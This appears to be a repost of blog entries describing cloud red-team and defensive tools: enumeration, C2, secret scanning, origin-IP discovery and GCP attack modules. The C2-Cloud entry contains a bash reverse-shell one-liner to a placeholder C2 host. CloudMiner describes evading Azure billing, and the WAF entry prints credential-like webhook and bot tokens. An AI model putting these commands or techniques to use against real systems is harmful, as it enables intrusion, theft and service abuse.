
CloudBrute - Awesome Cloud Enumerator

By: Zion3R


A tool to find a company's (target's) infrastructure, files, and apps across the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The output is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available here.


Motivation

We are always thinking about what we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted in the cloud, and possibly apps behind proxy servers.
Here is the list of issues in previous approaches that we tried to fix:

  • Separate wordlists
  • Lack of proper concurrency
  • Lack of support for all major cloud providers
  • Requiring authentication, keys, or cloud CLI access
  • Outdated endpoints and regions
  • Incorrect file storage detection
  • No support for proxies (useful for bypassing region restrictions)
  • No support for user-agent randomization (useful for bypassing rare restrictions)
  • Hard to use and poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross-platform (Windows, Linux, macOS)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - Storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operating system and follow the usage instructions.

To make the best use of this tool, you have to understand how to configure it correctly. Inside your downloaded release there is a config folder containing a config.yaml file.

It looks like this:

providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before running the tool.
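To make the mutation idea concrete, here is a rough sketch of how a keyword and the environments list expand into candidate URLs (illustrative Python only, not CloudBrute's actual Go implementation; the Amazon S3 URL pattern is just one example target format):

# Illustrative mutation sketch; not CloudBrute's actual code.
keyword = "target"
environments = ["test", "dev", "prod", "stage", "staging", "bak"]

candidates = {keyword}
for env in environments:
    for sep in ("-", "."):
        candidates.add(f"{env}{sep}{keyword}")
        candidates.add(f"{keyword}{sep}{env}")

# Each candidate is then checked against a provider's storage URL format,
# e.g. Amazon S3:
for name in sorted(candidates):
    print(f"https://{name}.s3.amazonaws.com")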

After setting up your API key, you are ready to use CloudBrute.

[CloudBrute ASCII art banner]
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generate URLs
-w --wordlist path to wordlist
-c --cloud force search on a specific provider; check the config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


For example:

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

In action

How to contribute

  • Add a module or fix something and then open a pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with the community ♥

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you have found a bug, open an issue.

When I use proxies, I get too many errors, or it's too slow?

That's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify working proxies with your chosen provider.

Too fast or too slow?

Adjust the -T (timeout) option to get the best results for your run.

Credits

Inspired by every single repo listed here.



C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

๐Ÿ”’ Anywhere Access: Reach the C2 Cloud from any location.
๐Ÿ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐Ÿ–ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐Ÿ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

๐Ÿ› ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐Ÿ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ŸŒ Nginx: Effortlessly routing traffic between web and backend systems.
๐Ÿ“จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐Ÿš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐Ÿ’พ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reverse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chat_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers. Note: the c2-api service will not start until the database is initialized. If you receive 500 errors, try again after some time.
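Once the stack is up, a compromised host can call back to the reverse TCP listener (port 8888 above). A minimal smoke test uses the classic bash one-liner, assuming the C2 host is reachable at c2.example.com (placeholder hostname):

bash -i >& /dev/tcp/c2.example.com/8888 0>&1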

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.


CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

By: Zion3R


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

chmod +x clone.sh
./clone.sh

Input

This tool offers a CLI (command-line interface). The examples below review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
  "AWS": [
    {
      "bucket": "cloudtrail-logs-00000000-ffffff",
      "prefix": [
        "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
        "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
      ]
    },
    {
      "bucket": "aws-kosova-us-east-1-00000000"
    }
  ],
  "AZURE": [
    {
      "accountname": "logs",
      "container": [
        "cloudgrappler"
      ]
    }
  ]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json
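The authoritative query schema ships in the tool's default queries.json; as a rough illustration only (the field names below are hypothetical and should be checked against the bundled file), a custom file might pair a regex-style query with a source and metadata matching the output shown in Example 2:

{
  "queries": [
    {
      "query": "GetFileDownloadUrls.*secrets_",
      "source": "aws",
      "severity": "MEDIUM",
      "description": "Review use of CloudShell."
    }
  ]
}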

Running in your Cloud and Authenticating cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

By: Zion3R


Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

Currently enumerates the following:

Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)

Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps

Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps


See it in action in Codingo's video demo here.


Usage

Setup

Several non-standard libraries are required to support threaded HTTP requests and DNS lookups. You'll need to install the requirements as follows:

pip3 install -r ./requirements.txt

Running

The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

You can provide multiple keywords by specifying the -k argument multiple times.

Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example increasing it to 10:

./cloud_enum.py -k keyword -t 10

IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.
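For example, to widen an Azure scan you might edit the REGIONS list (the region names below are ordinary Azure regions, shown only as a sketch):

# cloudenum/azure_regions.py
REGIONS = ['eastus', 'westus2', 'northeurope']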

Complete Usage Details

usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

Multi-cloud enumeration utility. All hail OSINT!

optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans

Thanks

So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R


Execute code within Azure Automation service without getting charged

Description

CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23, which decided not to change the service behavior, as it is considered "by design". As of 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


Requirements

  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool

Installation

pip install .

Usage

usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to a requirements file to be installed and used by the script (relevant for Python scripts only)
-v, --verbose Enable verbose mode

Example usage

Python
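A hypothetical invocation for a Python payload (the script path and resource ID are placeholders, following the usage above):

python cloud_miner.py --path ./payload.py --id "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}" -c 1 -r requirements.txt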

Powershell
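And likewise for a PowerShell payload (again with placeholder values):

python cloud_miner.py --path ./payload.ps1 --id "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}" -c 1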

License

CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian



BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / access keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries that the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for 80+ unique regex signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
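The exact schema is defined by the bundled regexes.json; purely as a hypothetical illustration (field names and layout should be checked against the shipped file), an added signature could map a name and severity to a pattern along these lines:

{
  "name": "Hypothetical API Token",
  "regex": "hypo_[a-zA-Z0-9]{32}",
  "severity": "high"
}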

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a list of 80+ unique regex signatures in vulnFiles.json, which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from the response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



CloudRecon - Finding assets from certificates

By: Zion3R


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

You must have CGO enabled, and may have to install gcc to run CloudRecon:

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (e.g., cloud providers' IP ranges) and find these hidden gems for testers by inspecting those SSL certificates.

The tool suite has three parts, written in Go:

Scrape - a live tool that inspects the given ranges for a keyword in SSL certs' CN and SAN fields in real time.

Store - a tool to retrieve IPs' certs and save all their Orgs, CNs, and SANs, so you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")
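Example invocations built from the options above (the CIDR and search string are placeholders; 198.51.100.0/24 is a documentation range):

cloudrecon scrape -i "198.51.100.0/24" -p "443,8443"
cloudrecon store -i "198.51.100.0/24" -db certificates.db
cloudrecon retr -db certificates.db -cn "example"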


CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

Limitation

- Still in the development phase; sometimes it can't detect the real IP.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloakQuest3r with a single command-line argument: the target domain you want to analyze.

    git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloakQuest3r will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloakQuest3r simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
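For intuition, the core subdomain check can be sketched in a few lines of Python (a simplification of the approach, not CloakQuest3r's actual code; the Cloudflare prefixes shown are a small sample of its published ranges):

import socket

CLOUDFLARE_PREFIXES = ("104.16.", "104.17.", "172.64.")  # sample only

for sub in ["mail", "dev", "staging"]:  # candidate subdomains from a wordlist
    host = f"{sub}.example.com"
    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        continue  # subdomain does not resolve
    if not ip.startswith(CLOUDFLARE_PREFIXES):
        print(f"possible real IP: {host} -> {ip}")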

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



Aws-Waf-Header-Analyzer - The Purpose Of The Project Is To Create Rate Limit In AWS WaF Based On HTTP Headers

By: Zion3R


The purpose of the project is to create rate limits in AWS WAF based on HTTP headers.


Golang is a dependency for building the binary. See the documentation to install it: https://go.dev/doc/install

make
sudo make install

The rules configuration is very simple: for example, the threshold is the limit of requests in a given time window. It's possible to monitor multiple headers, but each header needs to be present in the HTTP request header log.

rules:
  header:
    x-api-id: # The header name in the HTTP request header
      threshold: 100
    token:
      threshold: 1000

It's possible to send notifications to Slack and Telegram. To configure Slack notifications, you need to create a webhook configuration; see the Slack documentation: https://api.slack.com/messaging/webhooks

Telegram bot father: https://t.me/botfather

notifications:
  slack:
    webhook-url: https://hooks.slack.com/services/DA2DA13QS/LW5DALDSMFDT5/qazqqd4f5Qph7LgXdZaHesXs

  telegram:
    bot-token: "123456789:NNDa2tbpq97izQx_invU6cox6uarhrlZDfa"
    chat-id: "-4128833322"

To set up AWS credentials, it's advisable to export them as environment variables. Here's a recommended approach:

export AWS_ACCESS_KEY_ID=".."
export AWS_SECRET_ACCESS_KEY=".."
export AWS_REGION="us-east-1"

retrive-logs-minutes-ago is the time range for fetching logs; in this example, logs from 1 hour ago.

aws:
  waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
  region: us-east-1
  retrive-logs-minutes-ago: 60
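Putting the fragments together, a complete configuration might look like this (a sketch assuming the rules, notifications, and aws sections live in one YAML file, which the snippets above suggest but do not state; secrets are elided):

rules:
  header:
    x-api-id:
      threshold: 100
    token:
      threshold: 1000

notifications:
  slack:
    webhook-url: https://hooks.slack.com/services/...

  telegram:
    bot-token: "..."
    chat-id: "..."

aws:
  waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
  region: us-east-1
  retrive-logs-minutes-ago: 60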


CloudPulse - AWS Cloud Landscape Search Engine

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about their target to create a profile that will later help them identify possible ways to get into an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from AWS EC2 machines available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


CloudPulse simplifies security assessments with a user-friendly interface. It allows you to effortlessly find a company's assets on the AWS cloud:

  • IPs
  • Subdomains
  • Domains associated with a target
  • Organization names
  • Origin IP discovery

1- Download CloudPulse:

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Run docker compose:

docker-compose up -d

3- Run the script.py script:

docker-compose exec web python script.py

4- Now go to http://:8000/search and enjoy the search engine.

To install manually instead:

1- Download CloudPulse:

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Set up a virtual environment:

python3 -m venv myenv
source myenv/bin/activate

3- Install the requirements.txt file:

pip install -r requirements.txt

4- Run an instance of Elasticsearch using Docker:

docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

5- Update script.py and the settings file to use the host 'localhost':

#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

#se/settings.py
ELASTICSEARCH_DSL = {
    'default': {
        'hosts': 'localhost:9200'
    },
}

6- Run script.py to index data in elasticsearch:

python script.py

7- Run the app:

python manage.py runserver 0:8000

Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (it contains close to 9 million records).

As an example, you can search for .mil data, or for a keyword such as tesla, and browse the matching records.

CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in researching and exploiting Google Cloud environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

User Authentication - auth
  • activate - Activate a Specific Authentication Method
  • add - Add a New Authentication Method
  • delete - Remove a Specific Authentication Method
  • list - List All Available Authentication Methods

Cloud Functions - functions
  • list - List All Deployed Cloud Functions
  • permissions - Display Permissions for a Specific Cloud Function
  • triggers - List All Triggers for a Specific Cloud Function

Cloud Storage - storage buckets
  • list - List All Storage Buckets
  • permissions - Display Permissions for Storage Buckets

Compute Engine - compute instances
  • add-ssh-key - Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and its modules!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



ZeusCloud - Open Source Cloud Security

By: Zion3R


ZeusCloud is an open source cloud security platform.

Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
